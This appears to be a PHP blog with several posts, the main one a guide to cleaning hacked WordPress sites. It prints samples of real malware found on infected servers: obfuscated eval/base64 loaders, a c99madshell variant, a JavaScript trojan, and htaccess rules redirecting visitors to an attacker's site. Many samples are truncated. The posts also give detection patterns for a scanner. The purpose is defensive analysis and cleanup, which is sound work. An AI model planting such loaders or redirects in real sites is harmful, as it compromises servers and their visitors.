Could not connect to LiveReload server

I’m using vagrant, virtualbox, guard-livereload, chrome browser, and Windows 7 OS.

I’m using the following command to login or connect to the vagrant server.
$ ssh 127.0.0.1 -p 2222 -i ~/.vagrant.d/insecure_private_key -l vagrant

In order, for my browser to connect to LiveReload server. I need to connect to the vagrant server via SSH:
Sample: $ ssh -L 35729:127.0.0.1:35729 <vagrant-ssh-config>
$ ssh -L 35729:127.0.0.1:35729 127.0.0.1 -p 2222 -i ~/.vagrant.d/insecure_private_key -l vagrant

Whew, You can now connect to the LiveReload server.

By the way, this is my Guardfile

...
guard 'livereload', :host => '127.0.0.1', :port => '35729' do
  watch(%r{.+\.(html)$})
  watch(%r{stylesheets/.+\.(css)})
  watch(%r{javascripts/.+\.(js)})
end
...

Posted in Uncategorized | Leave a comment

How to login to your server using SSH in PuTTY.

PuTTY is a free telnet and open source terminal emulator. I often use PuTTY to connect to my server for some reasons like creating a backup files, running simple scripts, deleting, moving files, and etc…

Below are the guidelines on how to use and login PuTTY to your server.

  1. Download and Install PuTTY
  2. Configuring PuTTY
    Enter you host name or IP Address.

    Example:
    123.45.67.89
    yourwebsite.com

  3. Credentials
    Enter your login username and password. You’ll notice that when
    enter a key password the cursor will not move and won’t even display
    anything like (*) just continue with it and then when you’re done just hit
    enter.

Done. You are now logged in. Please be careful using PuTTY you might delete, move, or overwrite your existing files. This is a powerful tool. If you need further information you can contact your hosting support about it or you can contact me. :)

Posted in Uncategorized | Leave a comment

Remove WordPress Header Tags

Add the code below to your [CURRENT_THEME_FOLDER]/function.php file.

<?php
remove_action( 'wp_head', 'feed_links_extra', 3 ); // Display the links to the extra feeds such as category feeds
remove_action( 'wp_head', 'feed_links', 2 ); // Display the links to the general feeds: Post and Comment Feed
remove_action( 'wp_head', 'rsd_link' ); // Display the link to the Really Simple Discovery service endpoint, EditURI link
remove_action( 'wp_head', 'wlwmanifest_link' ); // Display the link to the Windows Live Writer manifest file.
remove_action( 'wp_head', 'index_rel_link' ); // index link
remove_action( 'wp_head', 'parent_post_rel_link', 10, 0 ); // prev link
remove_action( 'wp_head', 'start_post_rel_link', 10, 0 ); // start link
remove_action( 'wp_head', 'adjacent_posts_rel_link', 10, 0 ); // Display relational links for the posts adjacent to the current post.
remove_action( 'wp_head', 'wp_generator' ); // Display the XHTML generator that is generated on the wp_head hook, WP version
?>

Posted in Wordpress | Leave a comment

WordPress Hack: Malware Scanner

This Malware Scanner script scans files and detects for a possible malware codes. This script will return a list of possible infected files. Each file will be labelled with (eval, c99madshell, & long_text) and a portion of the matched codes. The script will match a word “eval(…), <?php $md5=”…”; $wp_salt=”…”; … (also know as ‘c99madshell’), and a long_text such as “FEKS2121asFklMn83kUgdlf/sDkn12L+…”, because I believe these are potential malware code.

When you’re done running the malware scanner script, double check the result. Do not delete or clean them immediately. The script matches also clean files as long as it has the 3 potential hacker codes. So, please be careful.

Below are the sample results:

1. ./website.com/wp-includes/js/tw-sack.dev.js – eval – eval(this.response

  • File  - ./website.com/wp-includes/js/tw-sack.dev.js
  • Label – eval
  • Small portion of Matched Code – eval(this.response
  • Not a hacker code

2. ./website2.com/system/libs/65d1.php – long_text – UeZTUf77n6yg8roYttj54AztjS3gfP7FhotwRGOTO9CKDOJeAr

  • File  -  ./website2.com/system/libs/65d1.php
  • Label – long_text
  • Small portion of Matched Code – UeZTUf77n6yg8roYttj54AztjS3gfP7FhotwRGOTO9CKDOJeAr
  • I checked the file and confirmed it was a hacker’s code.

Download Malware Scanner
To use the script you can run it on your favorite browser or using a command line (recommended):

$ time php scanner_2.6.php 2>&1 >> scanner_log | tail -f scanner_log

This command will run the scanner_2.6.php and log the output on scanner_log file.

scanner_2.6
Title : scanner_2.6
Caption :
File name : scanner_2.6.zip
Size : 3 kB

Posted in Wordpress | 52 Comments

[Solve] WordPress Malware Script Attack Fix

Our server was hacked, and all PHP files were infected. The infected PHP file was injected with a malicious code / malware, see below, the code calls another PHP file and run it’s program. In order, to clean the files I need to removed the malware or malicious codes on each files. It is really frustrating if you have hundreds of infected files. so, what I did is, I created a script that will do that automatically.

List of Malicious Code / Malware Script that I have encountered so far:

A. c99madshell – this type of malware script has the ability to view your database and access your files, just like an admin. Below is the sample code:

<?php
$md5 = "2b351068f6742153073f3af2e7fa11de";
$wp_salt = array('6',"r",')',"f",'i','4',"z",'_','(','e',";","g","o",'b',"a","$","v","d","t",'n','c',"l","s");
$wp_add_filter = create_function('$'.'v',$wp_salt[9].$wp_salt[16].$wp_salt[14].$wp_salt[21].$wp_salt[8].$wp_salt[11].$wp_salt[6].$wp_salt[4].$wp_salt[19].$wp_salt[3].$wp_salt[21].$wp_salt[14].$wp_salt[18].$wp_salt[9].$wp_salt[8].$wp_salt[13].$wp_salt[14].$wp_salt[22].$wp_salt[9].$wp_salt[0].$wp_salt[5].$wp_salt[7].$wp_salt[17].$wp_salt[9].$wp_salt[20].$wp_salt[12].$wp_salt[17].$wp_salt[9].$wp_salt[8].$wp_salt[15].$wp_salt[16].$wp_salt[2].$wp_salt[2].$wp_salt[2].$wp_salt[10]);
$wp_add_filter('FZnHEqvGFkU/x3YxIKdyeUDOGZEmr8gZRA5f/3SH0gS6+/...');
?>

B. Trojan

<?php
...
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJj..."));
...

C. Trojan

<?php
if(!function_exists('b4xvpqj38lpm8ux')){function b4xvpqj38lpm8ux($almi){$ddhg='mi=';$obwyp2='ba';$tqmtyx='$a';$dl8u6='4';$ufhk7=';';$fead2i='l';$jqml='e';$gndg='c';$c8px1='al';$fnidfi='ode';$u5vntk='se6';$uhoe='($';$wucoiz='_d';$ebexu='mi)';eval($tqmtyx.$fead2i.$ddhg.$obwyp2.$u5vntk.$dl8u6.$wucoiz.$jqml.$gndg.$fnidfi.$uhoe.$c8px1.$ebexu.$ufhk7);return $almi;}$dn4b2l='DTh0aDxGZzVodDE1Zzx4T19SQ1NfbEFKUnIrSjpxeGpqM2c1aHQxNTx4T19SQ1NfbEFKUnIrSjpxeDRuajt0MXRSWjVpPHhndFoySW0+UjVNTUtNWng0Tmo7NU1NS01STTUyS01pdDFkPE5qO2c1aHQxNTx4T19SU2JsOjBKUio6X0NsRzB4NHhNNWFLaTVSWndNdDJpUmFtd254ajtnNWh0MTU8eE9fUitDOlJTUFNEOlJDU19sQUp4NGlNLTVqO2c1aHQxNTx4T19SU1BTRDpSQ1NfbEFKUkpscjp4NFdOVldOVm5wajtnNWh0MTU8eE9fUitDOlJTUFNEOlJDOl8qOl9sQXg0aU0tNWo7ZzVodDE1PHhPX1JTUFNEOlJDOl8qOl9sQVJKbHI6eDRXTlZXTlZucGo7aC0xd2l0SzF8T19Scm1kdHdDaU10MlpJbVpmNVo8JG1NTWozdGg8dFpSbU1NbT48JG1NTWpqMyRtTU05bU1NbT5SYW0yPCdPX1JybWR0d0NpTXQyWkltWmY1Wic0JG1NTWo7QjVJWjUzJG1NTTlaaU10MlpJbVpmNVo8JG1NTWo7Qk01aS1NMXwkbU1NO0JoLTF3aXRLMXxPX1JsMXRpPGozZzV...';eval(b4xvpqj38lpm8ux('JGRuNGIybD1iNHh2cHFqMzhscG04dXgoJGRuNGIybCk7JGRuNGIybD1zdHJ0cigkZG40YjJsLCdnKzQhdk9WdS9OYnc5V0Ege0hCNUU4PmpJaHRxb01zeENUbllfYXBRKDwuMm1SNzFKUyJacktYaWZsKXkKOmV9RDN8UDY9Y0wway0qR3pGLFVkJywn...'));}

D. Javascript Trojan

<script>if(window.document)aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';try{new location(12);}catch(qqq){...}ee='e';e=window.eval;t='y';}h=-4*Math.tan(Math.atan(0.5));n="3.5a3.5a51.5a50a15a19a49a54...".split("a");for(i=0;i-n.length

E. htaccess – The code below redirects your visitors to the hackers site (massage-pool.ru)

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
</IfModule>

ErrorDocument 400 http://massage-pool.ru/mysave/index.php
ErrorDocument 401 http://massage-pool.ru/mysave/index.php
ErrorDocument 403 http://massage-pool.ru/mysave/index.php
ErrorDocument 404 http://massage-pool.ru/mysave/index.php
ErrorDocument 500 http://massage-pool.ru/mysave/index.php

F. Timthumb Vulnerability

This script basically use to crop and resize images, it used in most WP Premium themes, but hackers were able to find the vulnerability of this script and was able to do whatever they want, unfortunately, with the help of this script they can access your database to get important information, insert malicious codes in all of your php files, and even create another malicious php script, and can do a lot more.

Any timthumb.php or thumb.php file that is below 1.35 version is vulnerable I advice to update the file to 2.0 and up version.

Solution: Update your file here: http://timthumb.googlecode.com/svn/trunk/timthumb.php

G. class-wheel.php

As far as I decoded the file, the script sends important information of your server to thebestcache.com and then the script gets data from that server and then execute it. I think with this script the hacker can do whatever they want to do to your server just like on timthumb such as writes RewriteRule on your htaccess to redirect user to his/hackers site, insert malicious iframes, insert malicious javascript, and a lot more.

Solution: Delete this file immediately

Below is the snippet code of the script

<? $GLOBALS['_1739858145_']=Array('e' .'rror' .'_' .'r' .'eporting','' .'in' .'i_' .'se' .'t','in' .'i_set','' .'soc' .'k' .'et_' .'get' .'peerna' .'m' .'e','s' .'trto' .'k','strpbrk','session_' .'i' .'s_reg' .'ist' .'ered','preg_replace','ima' .'gecre' .'at' .'efro' .'mg' .'i' .'f','ar' .'ray_pop','implode','preg_mat' .'ch','i' .'m' .'pl' .'ode','preg_ma' .'t' .'ch','str' .'ripos','fl' .'o' .'ck','array_f' .'lip','mt_rand','p' .'reg_' .'match','p' .'reg_mat' .'ch','im' .'pl' .'o' .'de','p' .'reg_' .'m' .'a' .'tch','' .'b' .'as' .'e64_encode','ser' .'ialize','fi' .'l' .'e' .'_get' .'_c' .'ontents','b' .'ase64_d' .'ecode','preg_m' .'atch','' .'pre' .'g_rep' .'la' .'ce','' .'preg_replace','u' .'nse' .'ri' .'alize','base64' .'_d' .'e' ...

H. god_mode_on

<?php /*god_mode_on*/eval(base64_decode("ZXZhbChiYXNl...")); /*god_mode_off*/ ?>
<?php /*f2c315e178b39d12fa925987425e4e25_on*/ $Py0IAoRh= array('10100','10117','10096','10107');$VMteSwXRc7lP= array('4892','4907','4894','4890','4909','4894','4888','4895','4910','4903','4892','4909','4898','4904','4903');$xvak07gN5kcVT= array('6294','6293','6311','6297','6250','6248','6291','6296','6297','6295','6307','6296','6297');$YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTm...";if (!function_exists("TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5")){ function TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16,$bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg = '';foreach($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16 as $QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg .= chr($QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH - $bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr);}return $Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg;}$zs4ALsgC4dMC1kTLd = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($Py0IAoRh,9999);$G2dp21boYT5TLmcF = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($VMteSwXRc7lP,4793);$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($xvak07gN5kcVT,6196);$eozu2spipON = $G2dp21boYT5TLmcF('$MxYAjVJONC',$zs4ALsgC4dMC1kTLd.'('.$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB.'($MxYAjVJONC));');$eozu2spipON($YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X);} /*f2c315e178b39d12fa925987425e4e25_off*/ ?>

I. Trojan

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1Uj...";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\xp76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\xp76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

Most these attacks happens when you have old version of your programs – WordPress, Joomla, Timthumb, WP Plugins, easy ftp or sftp password, and infected computer can use your ftp as well. Make sure you have an updated version of your programs.

Download and Install
Downloand cleaner script below and put in on your root directory or any directory. This program will check all the PHP files and clean it if it’s infected with Malware code above.

Malware code keeps on coming back
If you remove malware code / malicious script successfully but if it still keeps on coming back. I suggest you to run malware scanner: http://www.php-beginners.com/wordpress-hack-malware-scanner.html and please send the scan result to info@php-beginners.com, we need to find file that causes the malware code / malicious script on coming back.

You can download two types of Cleaner script
Web browser and Shell Access version. You can use any of the two.

  • Download Cleaner 2.10 HTTP Version below and run it on your favorite browser.
    Example: http://www.yoursite.com/cleaner_2.10.php
    cleaner_2.10
    Title : cleaner_2.10
    Caption :
    File name : cleaner_2.10.zip
    Size : 2 kB
  • Download Cleaner CLI 2.10 Version below and run it using terminal or command line.
    Example: $ time php cleaner-cli_2.10.php 2>&1 >> cleaner_log
    The command above will run the cleaner-cli_2.10.php script and log the output to cleaner_log file.
    cleaner-cli_2.10
    Title : cleaner-cli_2.10
    Caption :
    File name : cleaner-cli_2.10.zip
    Size : 2 kB

Note:
Please don’t forget to create a backup of your wordpress files or /wp-content/ directory only. Use shell access to backup files because it is fast and easy.
You can do it like this: $ tar -cvzf [output_directory.tar.gz] [directory]

[~/wordpress-directory]# tar -cvzf wp-backup-content-only.tar.gz ./wp-content
or
[~/wordpress-directory]# tar -cvzf wp-backup-all.tar.gz ./

This malware / malicious cleaner script works on all php programs, you can run it even if it’s a non-wordpress sites, but please create a backup of your files before you run the cleaner script, just to make sure you can recover it easily.

If you experienced any malware / malicious program that I don’t know, please let me know so that I can add it on the program. Thanks.

Posted in Uncategorized | 287 Comments